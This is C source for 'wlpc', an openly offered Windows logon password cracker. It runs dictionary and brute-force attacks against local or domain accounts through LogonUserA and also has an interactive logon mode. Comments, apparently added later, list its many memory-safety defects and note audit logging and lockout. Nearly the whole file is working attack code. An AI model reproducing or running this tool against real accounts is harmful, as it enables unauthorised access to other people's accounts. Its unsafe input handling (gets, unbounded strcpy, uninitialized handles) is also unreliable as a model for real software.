Link with advapi32.lib:
#include <Windows.h>
#include <conio.h>
#include <cctype>
#include <cstdarg>
#include <cstdio>
#include <cstdlib>
#include <cstring>
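// Print a printf-style message to stderr and terminate the process with
// status 1. Never returns.
//
// Parameters:
//   format - printf-style format string; the variadic arguments are the values
//            it consumes. Callers pass a literal format (as both call sites in
//            this file do); user-controlled text must go through "%s".
void die(const char* format, ...) {
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    // Every va_start must be paired with va_end, even though exit() follows.
    va_end(args);
    exit(1);
}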
// Attempt an authentication with the supplied credentials via LogonUserA
// (LOGON32_LOGON_NETWORK, default provider) and report the outcome.
//
// Parameters:
//   user, pass, domain - NUL-terminated strings passed straight to LogonUserA;
//                        domain "." means the local machine.
//   showmsg            - when true, print the Win32 error text on failure or
//                        "Success!" on success.
// Returns: 1 on success; on failure 0, unless showmsg is true, in which case
//          the nonzero GetLastError() code is returned instead. Callers that
//          treat nonzero as success (brute() and main() do) must therefore
//          pass showmsg=false, or a failure would be mistaken for success.
//
// Every call is a genuine logon attempt evaluated by the OS, so it is subject
// to the target's audit logging and account-lockout policy like any other
// authentication.
int logon(const char* user, const char* pass, const char* domain, bool showmsg) {
DWORD ret = 1;
HANDLE tok; // written by LogonUserA on success; not guaranteed to be set on failure
char* msg;  // written by FormatMessageA on success only; indeterminate otherwise
if (!LogonUserA(user,domain,pass,LOGON32_LOGON_NETWORK,LOGON32_PROVIDER_DEFAULT,&tok)) {
ret = 0;
if (showmsg) {
ret = GetLastError();
// BUG: the return value of FormatMessageA is not checked. If it fails, msg is
// never assigned and the puts()/LocalFree() below operate on a garbage pointer.
FormatMessageA(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
ret,
NULL,
(char*)&msg,
0, NULL
);
puts(msg);
LocalFree(msg);
}
} else { if (showmsg) puts("Success!"); }
// BUG: on the failure path tok was never initialized, so this closes an
// indeterminate handle value; CloseHandle should only run when LogonUserA
// succeeded.
CloseHandle(tok);
return ret;
}
// Interactive mode: read one-letter commands from stdin until 'q', letting the
// operator set domain/user/password and trigger one logon() per 'x'. Only the
// first character of each line is dispatched on; the argument is everything
// from the third character on. The four 256-byte buffers are released only
// on the 'q' path.
//
// Input-handling hazards visible in this block:
//   - gets() performs an unbounded read into a 256-byte buffer (it was removed
//     from the language for exactly this reason); fgets(input, 256, stdin) is
//     the bounded replacement.
//   - the strcpy() calls copy from input+2 with no length check, and when the
//     line is shorter than two characters input+2 already points past the
//     terminator into uninitialized buffer space.
//   - user and pass are malloc()'d but never initialized, so an 'x' issued
//     before 'u' and 'p' passes indeterminate strings to logon().
//   - malloc() results are not checked for NULL.
void prompt() {
char *domain, *user, *pass, *input;
domain = (char*)malloc(256);
user = (char*)malloc(256);
pass = (char*)malloc(256);
input = (char*)malloc(256);
// Default domain "." = local machine (see the help text below).
domain[0] = '.';
domain[1] = 0;
for (;;) {
fputs("-", stdout);
gets(input); // unbounded read - see hazards above
switch (input[0]) {
case '?':
puts(
"Interactive mode commands:\n"
"d DOMAIN Set domain (Use \".\" for local machine)\n"
"u USER Set username\n"
"p PASS Set password\n"
"x Attempt logon\n"
"q Quit\n"
);
break;
// Each setter copies the remainder of the line (after "X ") unbounded.
case 'd': strcpy(domain, input + 2); break;
case 'u': strcpy(user, input + 2); break;
case 'p': strcpy(pass, input + 2); break;
// showmsg=true: logon() prints the result itself; its return value is unused.
case 'x': logon(user, pass, domain, true); break;
case 'q': free(domain); free(user); free(pass); free(input); return;
default: puts("Unknown command\n");
}
}
}
// Character classes to include when brute() builds its candidate alphabet.
// Each flag selects one class; brute() appends the selected classes in a
// fixed order (lowercase, digits, space, uppercase, punctuation).
struct pass_type {
bool lcase; // 'a'..'z'
bool ucase; // 'A'..'Z'
bool digit; // '0'..'9'
bool punct; // characters in 0x21..0x7e for which ispunct() is true
bool space; // the single ' ' character
};
// Exhaustive search over strings built from the classes selected in ptype:
// candidates are generated odometer-style (each position cycles through the
// alphabet; a wrap carries into the next position, and the string grows by one
// character once every position has wrapped) and each one is handed to
// logon(). The loop ends on the first logon() success or when the operator
// presses Enter.
//
// Parameters:
//   user, domain - passed through to logon() unchanged
//   ptype        - selects which character classes form the alphabet
//
// Defects visible in this block:
//   - the "for (k = 0; chrs[k]; k++)" scan looks for the alphabet terminator
//     BEFORE "chrs[j] = 0" writes one, so it walks uninitialized heap memory
//     and k (meant to index the last alphabet character) is unreliable.
//   - pass grows without any check against its 256-byte allocation.
//   - chrs and pass are freed on the Enter path but leaked on the success path.
//   - malloc() results are not checked for NULL.
// Alphabet capacity: at most 26+10+1+26+32 = 95 characters plus the terminator
// in the C locale, which fits the 100-byte allocation.
//
// Every candidate is a real authentication attempt evaluated by the OS, so the
// whole run is visible to audit logging and throttled by account-lockout policy.
void brute(const char* user, struct pass_type * ptype, const char* domain) {
char i;              // loop variable / index; char because it also holds candidate characters
int j = 0, k;        // j: write index into chrs, later strlen(pass); k: index of last alphabet char
char * chrs, * pass; // chrs: candidate alphabet; pass: current candidate string
bool carry;          // true when a position wrapped and the next position must advance
chrs = (char*)malloc(100);
pass = (char*)malloc(256);
// Build the alphabet in a fixed class order.
if (ptype->lcase) for (i = 'a'; i <= 'z'; i++, j++) chrs[j] = i;
if (ptype->digit) for (i = '0'; i <= '9'; i++, j++) chrs[j] = i;
if (ptype->space) chrs[j++] = ' ';
if (ptype->ucase) for (i = 'A'; i <= 'Z'; i++, j++) chrs[j] = i;
if (ptype->punct) for (i = 0x21; i < 0x7f; i++) if (ispunct(i)) chrs[j++] = i;
// BUG: chrs is not yet terminated here (that happens on the next line), so this
// scan reads past the written characters into uninitialized memory.
for (k = 0; chrs[k]; k++); k--;
chrs[j] = 0;
// First candidate: a single copy of the first alphabet character.
pass[0] = chrs[0];
pass[1] = 0;
puts("Press Enter anytime to stop. . .");
Sleep(1000);
// Print each candidate; stop as soon as logon() reports success.
for (puts(pass); !logon(user, pass, domain, false); puts(pass)) {
// Operator pressed Enter: release the buffers and abort.
if (_kbhit()) if (_getch() == '\r') {
free(chrs);
free(pass);
puts("\nStopped.");
return;
}
// Odometer increment starting at the lowest position.
i = 0;
do {
if (pass[i] == chrs[k]) {
// Last alphabet character: wrap this position and carry into the next.
carry = true;
pass[i] = chrs[0];
} else {
// Advance to the next alphabet character; relies on pass[i] always being
// a member of chrs, which holds by construction.
carry = false;
pass[i] = *(strchr(chrs, pass[i]) + 1);
break;
}
} while (pass[++i]);
// Every position wrapped: append one more character (no bound check on pass).
if (carry) {
j = strlen(pass);
pass[j] = chrs[0];
pass[++j] = 0;
}
}
// Success path: chrs and pass are not freed here.
puts("\nSuccess!");
return;
}
// Entry point. Modes: no arguments -> usage text via die(); "-i" -> interactive
// prompt(); "-b" -> brute(); otherwise a dictionary run that reads one
// candidate per line from the "-w" file. argv[1] is always taken as the
// username.
//
// Defects visible in this block:
//   - "-d" and "-w" read argv[++i] without checking that i+1 < argc, so a
//     trailing switch dereferences argv[argc] (NULL).
//   - wfile is never initialized; without "-w" (and without "-b"/"-i") the
//     fopen() below receives an indeterminate pointer.
//   - pass is malloc()'d twice; the first allocation leaks.
//   - "*strpbrk(pass, "\r\n") = 0" dereferences NULL for a line with no line
//     terminator (typically the last line of the file), and fgets() splits
//     lines longer than 255 characters into several candidates.
//   - the usage text lists "-d" among the brute-force class switches, but the
//     parser uses "-n" for digits ("-d" is the domain switch).
//   - the option loop starts at i = 1, so the username itself is compared
//     against every switch name.
//
// Every dictionary entry is a real authentication attempt evaluated by the OS
// and is therefore visible to audit logging and subject to lockout policy.
int main(int argc, char ** argv) {
if (argc == 1)
die(
"wlpc - by Jakash3\n"
"Windows Logon Password Cracker\n"
"Usage: %s [username [-w wordfile | -b [-l -u -d -p -s]] [-d domain]] | -i \n\n"
"-w wordfile Dictionary attack. Using file containing line by line passwords\n"
"-b Bruteforce attack using one or more of the following switches:\n"
" -l Include lowercase alphabetical characters.\n"
" -u Include uppercase alphabetical characters.\n"
" -n Include digit characters\n"
" -p Include punctuation characters\n"
" -s Include space\n"
"username Name of user account to try logging in as\n"
"-d domain Optional. Remote Domain or server holding the user account\n"
"-i Interactive mode\n", argv[0]
);
if (argc == 2 && !strcmp(argv[1], "-i")) { prompt(); return 0; }
FILE* f;
char *pass, *domain = ".", *wfile; // wfile: only set by "-w" (see defects above)
bool bf = false;                    // true once "-b" is seen
struct pass_type p;
memset(&p, 0, sizeof(struct pass_type));
int i;
// Switch parsing; "-d" and "-w" consume the following argument unchecked.
for (i = 1; i < argc; i++) {
if (!strcmp(argv[i], "-d")) domain = argv[++i];
else if (!strcmp(argv[i], "-i")) { prompt(); return 0; }
else if (!strcmp(argv[i], "-w")) wfile = argv[++i];
else if (!strcmp(argv[i], "-b")) bf = true;
else if (!strcmp(argv[i], "-l")) p.lcase = true;
else if (!strcmp(argv[i], "-u")) p.ucase = true;
else if (!strcmp(argv[i], "-n")) p.digit = true;
else if (!strcmp(argv[i], "-p")) p.punct = true;
else if (!strcmp(argv[i], "-s")) p.space = true;
}
if (bf) { brute(argv[1], &p, domain); return 0; }
pass = (char*)malloc(256); // leaked: overwritten by the second malloc below
if (!(f = fopen(wfile, "r"))) die("Failed to open %s\n", wfile);
pass = (char*)malloc(256);
puts("Press Enter anytime to stop. . .");
Sleep(1000);
// The fgets() check below is what actually ends the loop; the feof() test
// only avoids one extra iteration.
while (!feof(f)) {
// Operator pressed Enter: release resources and abort.
if (_kbhit())
if (_getch() == '\r') {
fclose(f);
free(pass);
puts("\nStopped.");
return 0;
}
if (!fgets(pass, 256, f)) break;
// Strip the line terminator; NULL dereference if the line has none.
*strpbrk(pass, "\r\n") = 0;
puts(pass);
if (logon(argv[1], pass, domain, false)) {
puts("\nSuccess!");
fclose(f);
free(pass);
return 0;
}
}
puts("\nEnd of file!");
fclose(f);
free(pass);
return 0;
}